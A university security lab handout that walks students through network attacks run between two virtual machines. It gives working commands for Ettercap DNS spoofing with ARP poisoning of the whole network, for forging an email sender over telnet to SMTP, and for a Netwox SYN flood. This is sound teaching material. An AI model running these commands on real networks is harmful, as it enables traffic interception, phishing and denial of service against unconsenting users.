Blossom—Hands-on exercises for computer forensics and security
Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/3.0/.
Network Attacks
BLOSSOM Manchester Metropolitan University (Funded by Higher Education Academy) [email protected]
Blossom—Hands-on exercises for computer forensics and security
1. Learning Objectives This lab aims to understand various network attacks. 2. Preparation 1) Under Linux environment 2) Some documents that you may need to refer to:
• 'Virtual-MachineGuide.pdf' • ‘Linux-Guide.pdf’ • ‘BLOSSOM-UserGuide.pdf’ 3. Tasks Setup & Installation:
• Start two virtual machines as you have done with previous exercises (see Virtual Machine Guide)
# kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:57 -net vde -name node-one
# kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:58 -net vde -name node-two Blossom—Hands-on exercises for computer forensics and security
Task 1 DNS Spoofing Attack 1.1 DNS Spoofing is an attack which attempts to redirect traffic from one website to another, and for this task, we will use the network security tool Ettercap. This task also requires a local webserver to be active, such as Apache2.
1.2 On one of the virtual machines, install apache2 and ettercap, and then take note of the IP address of the machine. Apache2 will set up a local webpage on the local host IP address (127.0.0.1) which can also be accessed via the IP address of the machine from any of the virtual machines on the virtual network.
1.3 Now with the web server up and running, ettercap has a dns file that must be edited using the following command:
#gedit /usr/share/ettercap/etter.dns
In this file, delete everything and save the following into the file:
*
The wildcard (*) states that any website address entered into a browser will be redirected to the IP address supplied.
1.4 With the spoofed DNS entry now present, the ettercap tool can be started to initiate the DNS spoofing attack, which is performed using the following command:
#ettercap –T –q –P dns_spoof –M arp // //
-T specifies the use of the text based interface, -q runs the command in quiet mode so that captured packets are not output to the screen, -P dns_spoof specifies the use of the dns_spoof plugin, -M arp initiates a MITM ARP poisoning attack to intercept packets between hosts, and // // specifies the entire network as the target of the attack.
1.5 After the command has been successfully initiated, we can now use the other virtual machine to attempt to access a web site. Try typing in any web address into the browser and it should redirect to the Apache2 local host default web page.
1.6 Whilst the script is running, access a web site from the victim virtual machine, and the website should redirect from the intended web page, to the impersonated host.
Question: How would you go about only spoofing ‘www.google.com’ to redirect to the Apache2 local host that we created? Blossom—Hands-on exercises for computer forensics and security
Task 2 Email Spoofing 2.1 We can now take a look into a way in which email spoofing can be performed. Email spoofing is when an email is sent where the send address and other parts of the email header are altered to appear as though the email originated from a different source.
2.2 Following the installations, create two users on the virtual machine that will function as the sending and receiving parties respectively
#adduser alice #adduser bob
2.3 After creating both users, we can now send a legitimate email from one user to the other. Log in to alice and then open alpine.
#su alice #alpine
2.4 In the main window, press E to bypass the first screen, then press C to access the ‘Compose Message’ option. Send an email to bob@localhost with a subject title and some message text.
After you finish writing a basic email, press CTRL+X to send the message and then Q to quit the client.
2.5 Now log in to bob’s account and open alpine so that we can read the legitimate email in his inbox:
#su bob #alpine
Again, press E to skip the first screen and then press Enter twice to view the inbox and read the first message. There should be an email from ‘[email protected]’. Exit alpine as before by pressing Q.
2.6 Open another terminal window and type the following command:
#telnet localhost 25
This will connect us to the sendmail server which runs on the default smtp port 25. Type in the following commands after executing the telnet connection:
#HELO localdomain #MAIL FROM: alice@localhost #RCPT TO: bob@localhost #DATA #SUBJECT: Spoofed Email #Random Content Blossom—Hands-on exercises for computer forensics and security
#. #QUIT
Now go back to bob’s mailbox and compare the email addresses that the emails are sent from, and they should be identical. Task 3 Netwag / Netwox 3.1 Netwox is a command line network toolbox that provides multiple different possibilities for network attacks; Netwag is the graphical front end to Netwox.
http://www.cis.syr.edu/~wedu/Teaching/cis758/netw522/netwox- doc_html/html/examples.html The above document contains some useful information and examples regarding Netwox.
3.2 In order to perform a SYN Flood using Netwox, the following command can be used:
#Netwox 76 –i 10.0.2.17 –p 80
76 is the netwox tool for a SYN Flood attack, -i is the destination IP address, and –p is the port number. Netwox has a significant amount of network attack capabilities at its disposal.
Question/Task: Using Netwox, perform an ARP Poisoning attack on the 2nd virtual machine.